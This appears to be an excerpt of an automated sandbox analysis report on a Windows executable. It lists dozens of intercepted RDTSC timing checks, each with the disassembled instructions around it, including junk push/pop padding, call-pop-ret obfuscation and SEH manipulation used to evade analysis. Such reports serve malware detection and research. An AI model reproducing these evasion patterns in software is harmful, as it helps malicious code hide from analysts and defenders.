Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 5A2D78 second address: 5A2D94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jmp 00007F79C051386Fh 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 5A3048 second address: 5A304E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 5A2D94 second address: 5A2D98 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 5A304E second address: 5A3093 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 mov esi, eax 0x0000000b mov dword ptr [ebp+122D1B16h], ecx 0x00000011 push 00000000h 0x00000013 mov dword ptr [ebp+122D1C44h], eax 0x00000019 push 00000000h 0x0000001b push 00000000h 0x0000001d push eax 0x0000001e call 00007F79C0CFE298h 0x00000023 pop eax 0x00000024 mov dword ptr [esp+04h], eax 0x00000028 add dword ptr [esp+04h], 00000019h 0x00000030 inc eax 0x00000031 push eax 0x00000032 ret 0x00000033 pop eax 0x00000034 ret 0x00000035 mov si, ax 0x00000038 push eax 0x00000039 push edi 0x0000003a push eax 0x0000003b push edx 0x0000003c pushad 0x0000003d popad 0x0000003e rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 5A2D98 second address: 5A2DB1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F79C0513875h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 5A2DB1 second address: 5A2DB7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 5A37EF second address: 5A37F3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 5A3A49 second address: 5A3A53 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F79C0CFE296h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 5A37F3 second address: 5A37F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 5A3A53 second address: 5A3A59 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 5A3A59 second address: 5A3A5D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 5A3A5D second address: 5A3AD3 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F79C0CFE296h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f je 00007F79C0CFE2A0h 0x00000015 jmp 00007F79C0CFE29Ah 0x0000001a mov esi, dword ptr [ebp+122D1ACDh] 0x00000020 push 00000000h 0x00000022 push 00000000h 0x00000024 push ebp 0x00000025 call 00007F79C0CFE298h 0x0000002a pop ebp 0x0000002b mov dword ptr [esp+04h], ebp 0x0000002f add dword ptr [esp+04h], 0000001Ah 0x00000037 inc ebp 0x00000038 push ebp 0x00000039 ret 0x0000003a pop ebp 0x0000003b ret 0x0000003c mov edi, eax 0x0000003e push 00000000h 0x00000040 push 00000000h 0x00000042 push ecx 0x00000043 call 00007F79C0CFE298h 0x00000048 pop ecx 0x00000049 mov dword ptr [esp+04h], ecx 0x0000004d add dword ptr [esp+04h], 0000001Ch 0x00000055 inc ecx 0x00000056 push ecx 0x00000057 ret 0x00000058 pop ecx 0x00000059 ret 0x0000005a xchg eax, ebx 0x0000005b pushad 0x0000005c pushad 0x0000005d push eax 0x0000005e push edx 0x0000005f rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 5A3AD3 second address: 5A3AD9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 5A4593 second address: 5A45AC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F79C0CFE2A1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push edx 0x0000000c pop edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 5A45AC second address: 5A461B instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 jns 00007F79C0513872h 0x0000000e nop 0x0000000f push 00000000h 0x00000011 push edx 0x00000012 call 00007F79C0513868h 0x00000017 pop edx 0x00000018 mov dword ptr [esp+04h], edx 0x0000001c add dword ptr [esp+04h], 00000016h 0x00000024 inc edx 0x00000025 push edx 0x00000026 ret 0x00000027 pop edx 0x00000028 ret 0x00000029 push 00000000h 0x0000002b mov dword ptr [ebp+122D3617h], edx 0x00000031 push 00000000h 0x00000033 push 00000000h 0x00000035 push ecx 0x00000036 call 00007F79C0513868h 0x0000003b pop ecx 0x0000003c mov dword ptr [esp+04h], ecx 0x00000040 add dword ptr [esp+04h], 00000018h 0x00000048 inc ecx 0x00000049 push ecx 0x0000004a ret 0x0000004b pop ecx 0x0000004c ret 0x0000004d je 00007F79C0513866h 0x00000053 xchg eax, ebx 0x00000054 pushad 0x00000055 push eax 0x00000056 push edx 0x00000057 push eax 0x00000058 push edx 0x00000059 rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 5A461B second address: 5A461F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 5A461F second address: 5A4638 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F79C0513871h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push edi 0x0000000c pop edi 0x0000000d rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 5A50EC second address: 5A50F0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 5A6C3E second address: 5A6C55 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jbe 00007F79C051386Ch 0x00000011 je 00007F79C0513866h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 5A6C55 second address: 5A6C5A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 5A6C5A second address: 5A6C60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 5A7343 second address: 5A7347 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 5A83D9 second address: 5A83DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 5A919B second address: 5A91AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edi 0x00000006 push eax 0x00000007 jbe 00007F79C0CFE2B1h 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 5A7347 second address: 5A7415 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F79C0513870h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push ebx 0x00000010 call 00007F79C0513868h 0x00000015 pop ebx 0x00000016 mov dword ptr [esp+04h], ebx 0x0000001a add dword ptr [esp+04h], 00000019h 0x00000022 inc ebx 0x00000023 push ebx 0x00000024 ret 0x00000025 pop ebx 0x00000026 ret 0x00000027 push edi 0x00000028 ja 00007F79C051386Ch 0x0000002e pop edi 0x0000002f mov dword ptr [ebp+12445BCEh], ebx 0x00000035 push dword ptr fs:[00000000h] 0x0000003c jmp 00007F79C051386Eh 0x00000041 mov dword ptr fs:[00000000h], esp 0x00000048 jmp 00007F79C0513877h 0x0000004d mov eax, dword ptr [ebp+122D0299h] 0x00000053 push 00000000h 0x00000055 push ebx 0x00000056 call 00007F79C0513868h 0x0000005b pop ebx 0x0000005c mov dword ptr [esp+04h], ebx 0x00000060 add dword ptr [esp+04h], 0000001Ch 0x00000068 inc ebx 0x00000069 push ebx 0x0000006a ret 0x0000006b pop ebx 0x0000006c ret 0x0000006d pushad 0x0000006e adc eax, 67FFF7F7h 0x00000074 movsx ebx, bx 0x00000077 popad 0x00000078 push FFFFFFFFh 0x0000007a sub dword ptr [ebp+122D2F52h], eax 0x00000080 push eax 0x00000081 push eax 0x00000082 push edx 0x00000083 jmp 00007F79C051386Eh 0x00000088 rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 5AB126 second address: 5AB12A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 5AA430 second address: 5AA434 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 5AB12A second address: 5AB14E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push eax 0x00000008 pushad 0x00000009 jmp 00007F79C0CFE2A7h 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 5AB14E second address: 5AB152 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 5AF180 second address: 5AF184 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 5B00D6 second address: 5B00E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 push eax 0x00000007 push edi 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 5B2217 second address: 5B221B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 5B033B second address: 5B033F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 5AF367 second address: 5AF37D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F79C0CFE2A2h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 5B033F second address: 5B0345 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 5B23EB second address: 5B240F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F79C0CFE2A5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jg 00007F79C0CFE296h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 5B240F second address: 5B2415 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 5B2415 second address: 5B241B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 5B241B second address: 5B249F instructions: 0x00000000 rdtsc 0x00000002 ja 00007F79C0513866h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d ja 00007F79C051386Dh 0x00000013 push dword ptr fs:[00000000h] 0x0000001a mov ebx, dword ptr [ebp+122D3732h] 0x00000020 mov dword ptr fs:[00000000h], esp 0x00000027 push 00000000h 0x00000029 push edx 0x0000002a call 00007F79C0513868h 0x0000002f pop edx 0x00000030 mov dword ptr [esp+04h], edx 0x00000034 add dword ptr [esp+04h], 00000017h 0x0000003c inc edx 0x0000003d push edx 0x0000003e ret 0x0000003f pop edx 0x00000040 ret 0x00000041 push eax 0x00000042 jmp 00007F79C0513878h 0x00000047 pop edi 0x00000048 mov eax, dword ptr [ebp+122D0249h] 0x0000004e mov ebx, dword ptr [ebp+122D1ACDh] 0x00000054 push FFFFFFFFh 0x00000056 mov edi, 51A0ED98h 0x0000005b nop 0x0000005c jc 00007F79C0513870h 0x00000062 pushad 0x00000063 push eax 0x00000064 push edx 0x00000065 rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 5B6502 second address: 5B6506 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 5BEC8D second address: 5BECA4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jns 00007F79C0513866h 0x00000009 pushad 0x0000000a popad 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e pushad 0x0000000f ja 00007F79C0513866h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 5BECA4 second address: 5BECAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 5BF0D6 second address: 5BF0E3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ecx 0x00000009 pushad 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 5C3FCE second address: 5C3FD2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 5C3FD2 second address: 5C3FD8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 5C40EF second address: 5C4103 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a jns 00007F79C0CFE2A0h 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 5C4103 second address: 5C4111 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov eax, dword ptr [eax] 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 5C4111 second address: 5C4117 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 5C4117 second address: 5C4134 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jnp 00007F79C0513866h 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp+04h], eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F79C051386Bh 0x00000017 rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 5C57B2 second address: 5C57BE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007F79C0CFE296h 0x0000000a push esi 0x0000000b pop esi 0x0000000c rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 5CB75D second address: 5CB761 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 5CB761 second address: 5CB78C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F79C0CFE29Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F79C0CFE2A4h 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 5CB78C second address: 5CB792 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 5CB792 second address: 5CB7B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F79C0CFE2A1h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F79C0CFE29Bh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 5CB7B5 second address: 5CB7E7 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F79C0513866h 0x00000008 jmp 00007F79C051386Bh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F79C051386Bh 0x00000017 jmp 00007F79C051386Fh 0x0000001c rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 5CBAA2 second address: 5CBAA8 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 5CBBDB second address: 5CBBE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 5CBEC1 second address: 5CBEC7 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 5D06DC second address: 5D06FD instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F79C0513866h 0x00000008 jmp 00007F79C0513872h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 push eax 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 5D06FD second address: 5D070A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 je 00007F79C0CFE296h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 5D084C second address: 5D088E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 jc 00007F79C0513866h 0x0000000c popad 0x0000000d jne 00007F79C051386Ch 0x00000013 jp 00007F79C0513866h 0x00000019 push esi 0x0000001a jnp 00007F79C0513866h 0x00000020 jmp 00007F79C0513877h 0x00000025 pop esi 0x00000026 jg 00007F79C051386Eh 0x0000002c pushad 0x0000002d popad 0x0000002e push eax 0x0000002f push edx 0x00000030 rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 5D09CF second address: 5D09E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F79C0CFE2A2h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 5D09E5 second address: 5D09F5 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jbe 00007F79C0513866h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 5D09F5 second address: 5D09FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 5D09FB second address: 5D09FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 5D09FF second address: 5D0A05 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 5D0A05 second address: 5D0A2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F79C0513870h 0x0000000b popad 0x0000000c push ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F79C051386Eh 0x00000014 push eax 0x00000015 pop eax 0x00000016 rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 5D0E1F second address: 5D0E25 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 5D10B4 second address: 5D10BD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 5D10BD second address: 5D10C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F79C0CFE296h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 5D10C9 second address: 5D10DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 ja 00007F79C051386Ch 0x0000000b jc 00007F79C0513866h 0x00000011 push ebx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 5D1203 second address: 5D1229 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F79C0CFE296h 0x0000000a popad 0x0000000b pushad 0x0000000c jmp 00007F79C0CFE2A7h 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 5D1694 second address: 5D1698 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 59B9FB second address: 584613 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F79C0CFE2A3h 0x0000000b popad 0x0000000c nop 0x0000000d stc 0x0000000e call dword ptr [ebp+122D2B99h] 0x00000014 push eax 0x00000015 push edx 0x00000016 jo 00007F79C0CFE2A8h 0x0000001c jmp 00007F79C0CFE2A0h 0x00000021 pushad 0x00000022 popad 0x00000023 jmp 00007F79C0CFE29Fh 0x00000028 rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 59BB00 second address: 59BB19 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F79C0513875h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 59BB19 second address: 59BB3D instructions: 0x00000000 rdtsc 0x00000002 jne 00007F79C0CFE2A5h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jng 00007F79C0CFE2A4h 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 59BB3D second address: 59BB41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 59BB41 second address: 59BBE9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 xchg eax, ebx 0x00000007 mov dword ptr [ebp+122DBA07h], eax 0x0000000d push dword ptr fs:[00000000h] 0x00000014 push 00000000h 0x00000016 push ebp 0x00000017 call 00007F79C0CFE298h 0x0000001c pop ebp 0x0000001d mov dword ptr [esp+04h], ebp 0x00000021 add dword ptr [esp+04h], 00000019h 0x00000029 inc ebp 0x0000002a push ebp 0x0000002b ret 0x0000002c pop ebp 0x0000002d ret 0x0000002e mov cx, 7ACFh 0x00000032 mov dword ptr fs:[00000000h], esp 0x00000039 mov dword ptr [ebp+12476730h], esp 0x0000003f push 00000000h 0x00000041 push eax 0x00000042 call 00007F79C0CFE298h 0x00000047 pop eax 0x00000048 mov dword ptr [esp+04h], eax 0x0000004c add dword ptr [esp+04h], 00000016h 0x00000054 inc eax 0x00000055 push eax 0x00000056 ret 0x00000057 pop eax 0x00000058 ret 